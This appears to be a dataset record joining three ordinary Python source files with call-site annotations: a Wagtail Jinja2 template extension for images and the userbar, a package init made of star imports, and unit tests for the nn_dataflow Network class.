from jinja2 import nodes
from jinja2 import Markup
from wagtail.wagtailadmin.templatetags.wagtailuserbar import wagtailuserbar as original_wagtailuserbar
from wagtail.wagtailimages.models import Filter, SourceImageIOError
class WagtailUserBarExtension(Extension):
tags = set(['wagtailuserbar'])
def parse(self, parser):
call = self.call_method('_render', args=[nodes.ContextReference()])
return nodes.Output([nodes.MarkSafe(call)]).set_lineno(next(parser.stream).lineno)
def _render(self, context):
return Markup(original_wagtailuserbar(context))
class WagtailImagesExtension(Extension):
tags = set(['image'])
def parse(self, parser):
lineno = next(parser.stream).lineno
image_expr = parser.parse_expression()
filter_spec = parser.parse_expression()
if parser.stream.skip_if('name:as'):
output_var_name = parser.parse_expression()
output_var_name = nodes.Const(output_var_name.name)
else:
output_var_name = nodes.Const(None)
if output_var_name.value is not None:
return nodes.Assign(nodes.Name(output_var_name.value, 'store'),
self.call_method('_render', [image_expr, filter_spec, output_var_name]))
else:
return nodes.Output([
self.call_method('_render', [image_expr, filter_spec, output_var_name])
]).set_lineno(lineno)
def filter(self, filter_spec):
_filter, _ = Filter.objects.get_or_create(spec=filter_spec)
return _filter
def _render(self, image, filter_spec, output_var_name=None):
if not image:
return ''
try:
rendition = image.get_rendition(self.filter(filter_spec))
except SourceImageIOError:
# It's fairly routine for people to pull down remote databases to their
# local dev versions without retrieving the corresponding image files.
# In such a case, we would get a SourceImageIOError at the point where we try to
# create the resized version of a non-existent image. Since this is a
# bit catastrophic for a missing image, we'll substitute a dummy
# Rendition object so that we just output a broken link instead.
Rendition = image.renditions.model # pick up any custom Image / Rendition classes that may be in use
rendition = Rendition(image=image, width=0, height=0)
rendition.file.name = 'not-found'
if output_var_name:
# store the rendition object in the given variable
return rendition
else:
# render the rendition's image tag now
# resolved_attrs = {}
# for key in self.attrs:
# resolved_attrs[key] = self.attrs[key].resolve(context)
return rendition.img_tag({})
| [((42, 21, 42, 67), 'wagtail.wagtailimages.models.Filter.objects.get_or_create', 'Filter.objects.get_or_create', (), '', False, 'from wagtail.wagtailimages.models import Filter, SourceImageIOError\n'), ((17, 22, 17, 54), 'wagtail.wagtailadmin.templatetags.wagtailuserbar.wagtailuserbar', 'original_wagtailuserbar', ({(17, 46, 17, 53): 'context'}, {}), '(context)', True, 'from wagtail.wagtailadmin.templatetags.wagtailuserbar import wagtailuserbar as original_wagtailuserbar\n'), ((29, 30, 29, 63), 'jinja2.nodes.Const', 'nodes.Const', ({(29, 42, 29, 62): 'output_var_name.name'}, {}), '(output_var_name.name)', False, 'from jinja2 import nodes\n'), ((31, 30, 31, 47), 'jinja2.nodes.Const', 'nodes.Const', ({(31, 42, 31, 46): 'None'}, {}), '(None)', False, 'from jinja2 import nodes\n'), ((34, 32, 34, 74), 'jinja2.nodes.Name', 'nodes.Name', ({(34, 43, 34, 64): 'output_var_name.value', (34, 66, 34, 73): '"""store"""'}, {}), "(output_var_name.value, 'store')", False, 'from jinja2 import nodes\n'), ((13, 49, 13, 73), 'jinja2.nodes.ContextReference', 'nodes.ContextReference', ({}, {}), '()', False, 'from jinja2 import nodes\n'), ((14, 29, 14, 49), 'jinja2.nodes.MarkSafe', 'nodes.MarkSafe', ({(14, 44, 14, 48): 'call'}, {}), '(call)', False, 'from jinja2 import nodes\n')] |
XiaoguTech/rta-sandbox | rta/provision/__init__.py | 2783a3ba8920bf64273761ce7392e51c9c8fb1f7 | from rta.provision.utils import *
from rta.provision.passwd import *
from rta.provision.influxdb import *
from rta.provision.grafana import *
from rta.provision.kapacitor import *
| [] |
Pingziwalk/nn_dataflow | nn_dataflow/tests/unit_test/test_network.py | 5ae8eeba4e243df6e9a69127073513a852a62d17 | """ $lic$
Copyright (C) 2016-2020 by Tsinghua University and The Board of Trustees of
Stanford University
This program is free software: you can redistribute it and/or modify it under
the terms of the Modified BSD-3 License as published by the Open Source
Initiative.
This program is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE. See the BSD-3 License for more details.
You should have received a copy of the Modified BSD-3 License along with this
program. If not, see <https://opensource.org/licenses/BSD-3-Clause>.
"""
import unittest
from nn_dataflow.core import Network
from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, \
PoolingLayer, EltwiseLayer
class TestNetwork(unittest.TestCase):
''' Tests for Network. '''
# pylint: disable=too-many-public-methods
def setUp(self):
''' Set up. '''
self.network = Network('test_net')
self.network.set_input_layer(InputLayer(3, 224))
self.network.add('c1', ConvLayer(3, 64, 224, 3))
self.network.add('p1', PoolingLayer(64, 7, 32))
self.network.add('f1', FCLayer(64, 1000, 7))
def test_set_input_layer(self):
''' Modifier set_input_layer. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 24))
self.assertIsInstance(network.input_layer(), InputLayer)
self.assertEqual(network.input_layer().nofm, 3)
self.assertEqual(network.input_layer().hofm, 24)
self.assertEqual(network.input_layer().wofm, 24)
self.assertEqual(len(network), 0)
def test_set_input_layer_type(self):
''' Modifier set_input_layer type. '''
network = Network('test_net')
with self.assertRaisesRegex(TypeError, 'Network: .*input_layer.*'):
network.set_input_layer(Layer(3, 24))
with self.assertRaisesRegex(TypeError, 'Network: .*input_layer.*'):
network.set_input_layer(ConvLayer(3, 8, 24, 3))
def test_set_input_layer_duplicate(self):
''' Modifier set_input_layer duplicate. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 24))
with self.assertRaisesRegex(KeyError, 'Network: .*input.*'):
network.set_input_layer(InputLayer(3, 24))
def test_add(self):
''' Modifier add. '''
self.assertEqual(len(self.network), 3)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
self.assertEqual(len(self.network), 7)
def test_add_same_key(self):
''' Modifier add same key. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(KeyError, 'Network: .*c1.*'):
network.add('c1', ConvLayer(64, 128, 224, 3))
def test_add_no_input(self):
''' Modifier add no input. '''
network = Network('test_net')
with self.assertRaisesRegex(RuntimeError, 'Network: .*input.*'):
network.add('c1', ConvLayer(3, 64, 224, 3))
def test_add_no_prev(self):
''' Modifier add no prevs. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(KeyError, 'Network: .*prev.*p1.*'):
network.add('p1', PoolingLayer(64, 7, 32), prevs='p1')
def test_add_invalid_type(self):
''' Modifier add invalid type. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
with self.assertRaisesRegex(TypeError, 'Network: .*Layer.*'):
network.add('c1', (3, 64, 224, 3))
def test_add_unmatch_prev(self):
''' Modifier add unmatch prevs. '''
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
network.add('c1', ConvLayer(3, 64, 224, 3))
with self.assertRaisesRegex(ValueError,
'Network: .*c1.*p1.*mismatch fmap.*'):
network.add('p1', PoolingLayer(64, 7, 2))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError,
'Network: .*c1.*c2.*mismatch fmap.*'):
network.add('c2', ConvLayer(64, 128, 220, 3))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError, 'Network: .*c1.*prev.*p1.*'):
network.add('p1', PoolingLayer(32, 7, 32))
self.assertEqual(len(network), 1)
with self.assertRaisesRegex(ValueError, 'Network: .*c1.*prev.*c2.*'):
network.add('c2', ConvLayer(32, 128, 224, 3))
self.assertEqual(len(network), 1)
network.add('c2', ConvLayer(64, 128, 224, 3))
with self.assertRaisesRegex(ValueError,
r'Network: .*c1 | c2.*prev.*p1.*'):
network.add('p1', PoolingLayer(128, 7, 32), prevs=('c1', 'c2'))
self.assertEqual(len(network), 2)
def test_add_ext(self):
''' Modifier add_ext. '''
self.assertEqual(len(self.network), 3)
self.network.add_ext('e0', InputLayer(3, 24))
self.assertIsInstance(self.network['e0'], InputLayer)
self.assertEqual(self.network['e0'].nofm, 3)
self.assertEqual(self.network['e0'].hofm, 24)
self.assertEqual(self.network['e0'].wofm, 24)
self.network.add_ext('e1', InputLayer(5, (16, 20)))
self.assertIsInstance(self.network['e1'], InputLayer)
self.assertEqual(self.network['e1'].nofm, 5)
self.assertEqual(self.network['e1'].hofm, 16)
self.assertEqual(self.network['e1'].wofm, 20)
self.assertEqual(len(self.network), 3)
def test_add_ext_same_key(self):
''' Modifier add_ext same key. '''
network = Network('test_net')
network.add_ext('e0', InputLayer(3, 24))
with self.assertRaisesRegex(KeyError, 'Network: .*ext.*'):
network.add_ext('e0', InputLayer(3, 24))
def test_add_ext_invalid_type(self):
''' Modifier add_ext invalid type. '''
network = Network('test_net')
with self.assertRaisesRegex(TypeError, 'Network: .*external layer.*'):
network.add_ext('e0', Layer(3, 24))
with self.assertRaisesRegex(TypeError, 'Network: .*external layer.*'):
network.add_ext('e0', ConvLayer(3, 8, 24, 3))
def test_prevs(self):
''' Get prevs. '''
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
prevs = self.network.prevs('f1')
self.assertTupleEqual(prevs, ('p1',))
prevs = self.network.prevs('f2')
self.assertTupleEqual(prevs, ('p1',))
prevs = self.network.prevs('f3')
self.assertTupleEqual(prevs, ('f1', 'f2'))
def test_prevs_first(self):
''' Get prevs first layer. '''
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
prevs = self.network.prevs('c1')
self.assertTupleEqual(prevs, (None,))
prevs = self.network.prevs('c2')
self.assertTupleEqual(prevs, (None,))
def test_prevs_input(self):
''' Get prevs input layer. '''
with self.assertRaisesRegex(ValueError, 'Network: .*input.*'):
_ = self.network.prevs(self.network.INPUT_LAYER_KEY)
def test_prevs_ext_next(self):
''' Get prevs next layer of an external layer. '''
self.network.add_ext('e0', InputLayer(3, 224))
self.network.add('n', ConvLayer(6, 3, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'e0'))
prevs = self.network.prevs('n')
self.assertTupleEqual(prevs, (None, 'e0'))
def test_prevs_ext(self):
''' Get prevs external layer. '''
self.network.add_ext('e0', InputLayer(3, 3))
with self.assertRaisesRegex(ValueError, 'Network: .*ext.*'):
_ = self.network.prevs('e0')
def test_nexts(self):
''' Get nexts. '''
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
nexts = self.network.nexts('p1')
self.assertTupleEqual(nexts, ('f1', 'f2'))
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, ('f3', 'e4'))
nexts = self.network.nexts('f2')
self.assertTupleEqual(nexts, ('f3',))
nexts = self.network.nexts('f3')
self.assertTupleEqual(nexts, ('e4',))
def test_nexts_last(self):
''' Get nexts first layer. '''
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, (None,))
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
nexts = self.network.nexts('f1')
self.assertTupleEqual(nexts, (None,))
nexts = self.network.nexts('f2')
self.assertTupleEqual(nexts, (None,))
def test_nexts_input(self):
''' Get nexts input layer. '''
nexts = self.network.nexts(self.network.INPUT_LAYER_KEY)
self.assertTupleEqual(nexts, ('c1',))
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
self.network.add('c3', ConvLayer(6, 4, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'c2'))
nexts = self.network.nexts(self.network.INPUT_LAYER_KEY)
self.assertTupleEqual(nexts, ('c1', 'c2', 'c3'))
def test_firsts(self):
''' Get firsts. '''
firsts = self.network.firsts()
self.assertTupleEqual(firsts, ('c1',))
self.network.add('c2', ConvLayer(3, 3, 224, 1),
prevs=self.network.INPUT_LAYER_KEY)
self.network.add('c3', ConvLayer(6, 4, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'c2'))
firsts = self.network.firsts()
self.assertTupleEqual(firsts, ('c1', 'c2'))
self.assertIn('c1', firsts)
self.assertNotIn('c3', firsts)
def test_firsts_ext(self):
''' Get firsts with external layers. '''
self.network.add_ext('e0', InputLayer(3, 224))
self.network.add('c2', ConvLayer(3, 3, 224, 1), prevs=('e0',))
self.network.add('c3', ConvLayer(67, 3, 224, 1), prevs=('e0', 'c1'))
self.network.add('c4', ConvLayer(6, 3, 224, 1),
prevs=(self.network.INPUT_LAYER_KEY, 'e0',))
firsts = self.network.firsts()
self.assertIn('c2', firsts)
self.assertNotIn('c3', firsts)
self.assertIn('c4', firsts)
def test_lasts(self):
''' Get lasts. '''
lasts = self.network.lasts()
self.assertTupleEqual(lasts, ('f1',))
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
lasts = self.network.lasts()
self.assertTupleEqual(lasts, ('f1', 'f2'))
def test_ext_layers(self):
''' Get external layers. '''
self.assertTupleEqual(self.network.ext_layers(), tuple())
self.network.add_ext('e0', InputLayer(3, 224))
self.assertTupleEqual(self.network.ext_layers(), ('e0',))
self.network.add_ext('e1', InputLayer(3, 224))
self.assertTupleEqual(self.network.ext_layers(), ('e0', 'e1'))
def test_contains(self):
''' Whether contains. '''
self.assertIn('c1', self.network)
self.assertIn('p1', self.network)
self.assertIn('f1', self.network)
self.assertNotIn('f2', self.network)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.assertIn('f2', self.network)
def test_len(self):
''' Accessor len. '''
self.assertEqual(len(self.network), 3)
network = Network('test_net')
self.assertEqual(len(network), 0)
network.set_input_layer(InputLayer(3, 224))
self.assertEqual(len(network), 0)
network.add('c1', ConvLayer(3, 4, 224, 1))
self.assertEqual(len(network), 1)
self.network.add('f2', FCLayer(64, 2000, 7), prevs='p1')
self.assertEqual(len(self.network), 4)
self.network.add('f3', FCLayer(3000, 1000), prevs=('f1', 'f2'))
self.assertEqual(len(self.network), 5)
self.network.add('e4', EltwiseLayer(1000, 1, 2), prevs=('f1', 'f3'))
self.assertEqual(len(self.network), 6)
self.network.add('f4', FCLayer(1000, 1000), prevs='e4')
self.assertEqual(len(self.network), 7)
def test_iter(self):
''' Accessor iter. '''
num = 0
for layer in self.network:
self.assertIn(layer, self.network)
self.assertIsInstance(self.network[layer], Layer)
num += 1
self.assertEqual(len(self.network), num)
network = Network('test_net')
network.set_input_layer(InputLayer(3, 224))
with self.assertRaises(StopIteration):
_ = next(iter(network))
def test_contains_ext(self):
''' Whether contains external layer. '''
self.assertNotIn('e0', self.network)
self.network.add_ext('e0', InputLayer(3, 224))
self.assertIn('e0', self.network)
def test_len_ext(self):
''' Accessor len external layer. '''
self.assertEqual(len(self.network), 3)
self.network.add_ext('e0', InputLayer(3, 224))
self.assertEqual(len(self.network), 3)
def test_iter_ext(self):
''' Accessor iter external layer. '''
self.network.add_ext('e0', InputLayer(3, 224))
for layer in self.network:
self.assertNotEqual(layer, 'e0')
def test_getitem(self):
''' Accessor getitem. '''
self.assertIsInstance(self.network['c1'], ConvLayer)
self.assertIsInstance(self.network['p1'], PoolingLayer)
self.assertIsInstance(self.network['f1'], FCLayer)
def test_getitem_error(self):
''' Accessor getitem. '''
with self.assertRaisesRegex(KeyError, 'Network: .*c2.*'):
_ = self.network['c2']
def test_str(self):
''' Accessor str. '''
string = str(self.network)
for layer in self.network:
self.assertIn(layer, string)
| [((29, 23, 29, 42), 'nn_dataflow.core.Network', 'Network', ({(29, 31, 29, 41): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((37, 18, 37, 37), 'nn_dataflow.core.Network', 'Network', ({(37, 26, 37, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((47, 18, 47, 37), 'nn_dataflow.core.Network', 'Network', ({(47, 26, 47, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((55, 18, 55, 37), 'nn_dataflow.core.Network', 'Network', ({(55, 26, 55, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((72, 18, 72, 37), 'nn_dataflow.core.Network', 'Network', ({(72, 26, 72, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((81, 18, 81, 37), 'nn_dataflow.core.Network', 'Network', ({(81, 26, 81, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((88, 18, 88, 37), 'nn_dataflow.core.Network', 'Network', ({(88, 26, 88, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((97, 18, 97, 37), 'nn_dataflow.core.Network', 'Network', ({(97, 26, 97, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((105, 18, 105, 37), 'nn_dataflow.core.Network', 'Network', ({(105, 26, 105, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((152, 18, 152, 37), 'nn_dataflow.core.Network', 'Network', ({(152, 26, 152, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((160, 18, 160, 37), 'nn_dataflow.core.Network', 'Network', ({(160, 26, 160, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((318, 18, 318, 37), 'nn_dataflow.core.Network', 'Network', ({(318, 26, 318, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((343, 18, 343, 37), 'nn_dataflow.core.Network', 'Network', ({(343, 26, 343, 36): '"""test_net"""'}, {}), "('test_net')", False, 'from nn_dataflow.core import Network\n'), ((30, 37, 30, 55), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(30, 48, 30, 49): '(3)', (30, 51, 30, 54): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((31, 31, 31, 55), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(31, 41, 31, 42): '(3)', (31, 44, 31, 46): '(64)', (31, 48, 31, 51): '(224)', (31, 53, 31, 54): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((32, 31, 32, 54), 'nn_dataflow.core.PoolingLayer', 'PoolingLayer', ({(32, 44, 32, 46): '(64)', (32, 48, 32, 49): '(7)', (32, 51, 32, 53): '(32)'}, {}), '(64, 7, 32)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((33, 31, 33, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(33, 39, 33, 41): '(64)', (33, 43, 33, 47): '(1000)', (33, 49, 33, 50): '(7)'}, {}), '(64, 1000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((38, 32, 38, 49), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(38, 43, 38, 44): '(3)', (38, 46, 38, 48): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((56, 32, 56, 49), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(56, 43, 56, 44): '(3)', (56, 46, 56, 48): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((64, 31, 64, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(64, 39, 64, 41): '(64)', (64, 43, 64, 47): '(2000)', (64, 49, 64, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((65, 31, 65, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(65, 39, 65, 43): '(3000)', (65, 45, 65, 49): '(1000)'}, {}), '(3000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((66, 31, 66, 55), 'nn_dataflow.core.EltwiseLayer', 'EltwiseLayer', ({(66, 44, 66, 48): '(1000)', (66, 50, 66, 51): '(1)', (66, 53, 66, 54): '(2)'}, {}), '(1000, 1, 2)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((67, 31, 67, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(67, 39, 67, 43): '(1000)', (67, 45, 67, 49): '(1000)'}, {}), '(1000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((73, 32, 73, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(73, 43, 73, 44): '(3)', (73, 46, 73, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((75, 26, 75, 50), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(75, 36, 75, 37): '(3)', (75, 39, 75, 41): '(64)', (75, 43, 75, 46): '(224)', (75, 48, 75, 49): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((89, 32, 89, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(89, 43, 89, 44): '(3)', (89, 46, 89, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((91, 26, 91, 50), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(91, 36, 91, 37): '(3)', (91, 39, 91, 41): '(64)', (91, 43, 91, 46): '(224)', (91, 48, 91, 49): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((98, 32, 98, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(98, 43, 98, 44): '(3)', (98, 46, 98, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((106, 32, 106, 50), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(106, 43, 106, 44): '(3)', (106, 46, 106, 49): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((107, 26, 107, 50), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(107, 36, 107, 37): '(3)', (107, 39, 107, 41): '(64)', (107, 43, 107, 46): '(224)', (107, 48, 107, 49): '(3)'}, {}), '(3, 64, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((125, 26, 125, 52), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(125, 36, 125, 38): '(64)', (125, 40, 125, 43): '(128)', (125, 45, 125, 48): '(224)', (125, 50, 125, 51): '(3)'}, {}), '(64, 128, 224, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((136, 35, 136, 52), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(136, 46, 136, 47): '(3)', (136, 49, 136, 51): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((142, 35, 142, 58), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(142, 46, 142, 47): '(5)', (142, 49, 142, 57): '(16, 20)'}, {}), '(5, (16, 20))', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((154, 30, 154, 47), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(154, 41, 154, 42): '(3)', (154, 44, 154, 46): '(24)'}, {}), '(3, 24)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((169, 31, 169, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(169, 39, 169, 41): '(64)', (169, 43, 169, 47): '(2000)', (169, 49, 169, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((170, 31, 170, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(170, 39, 170, 43): '(3000)', (170, 45, 170, 49): '(1000)'}, {}), '(3000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((182, 31, 182, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(182, 41, 182, 42): '(3)', (182, 44, 182, 45): '(3)', (182, 47, 182, 50): '(224)', (182, 52, 182, 53): '(1)'}, {}), '(3, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((198, 35, 198, 53), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(198, 46, 198, 47): '(3)', (198, 49, 198, 52): '(224)'}, {}), '(3, 224)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((200, 30, 200, 53), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(200, 40, 200, 41): '(6)', (200, 43, 200, 44): '(3)', (200, 46, 200, 49): '(224)', (200, 51, 200, 52): '(1)'}, {}), '(6, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((208, 35, 208, 51), 'nn_dataflow.core.InputLayer', 'InputLayer', ({(208, 46, 208, 47): '(3)', (208, 49, 208, 50): '(3)'}, {}), '(3, 3)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((214, 31, 214, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(214, 39, 214, 41): '(64)', (214, 43, 214, 47): '(2000)', (214, 49, 214, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((215, 31, 215, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(215, 39, 215, 43): '(3000)', (215, 45, 215, 49): '(1000)'}, {}), '(3000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((216, 31, 216, 55), 'nn_dataflow.core.EltwiseLayer', 'EltwiseLayer', ({(216, 44, 216, 48): '(1000)', (216, 50, 216, 51): '(1)', (216, 53, 216, 54): '(2)'}, {}), '(1000, 1, 2)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((217, 31, 217, 50), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(217, 39, 217, 43): '(1000)', (217, 45, 217, 49): '(1000)'}, {}), '(1000, 1000)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((236, 31, 236, 51), 'nn_dataflow.core.FCLayer', 'FCLayer', ({(236, 39, 236, 41): '(64)', (236, 43, 236, 47): '(2000)', (236, 49, 236, 50): '(7)'}, {}), '(64, 2000, 7)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((248, 31, 248, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(248, 41, 248, 42): '(3)', (248, 44, 248, 45): '(3)', (248, 47, 248, 50): '(224)', (248, 52, 248, 53): '(1)'}, {}), '(3, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((250, 31, 250, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(250, 41, 250, 42): '(6)', (250, 44, 250, 45): '(4)', (250, 47, 250, 50): '(224)', (250, 52, 250, 53): '(1)'}, {}), '(6, 4, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((260, 31, 260, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(260, 41, 260, 42): '(3)', (260, 44, 260, 45): '(3)', (260, 47, 260, 50): '(224)', (260, 52, 260, 53): '(1)'}, {}), '(3, 3, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, FCLayer, PoolingLayer, EltwiseLayer\n'), ((262, 31, 262, 54), 'nn_dataflow.core.ConvLayer', 'ConvLayer', ({(262, 41, 262, 42): '(6)', (262, 44, 262, 45): '(4)', (262, 47, 262, 50): '(224)', (262, 52, 262, 53): '(1)'}, {}), '(6, 4, 224, 1)', False, 'from nn_dataflow.core import Layer, InputLayer, ConvLayer, 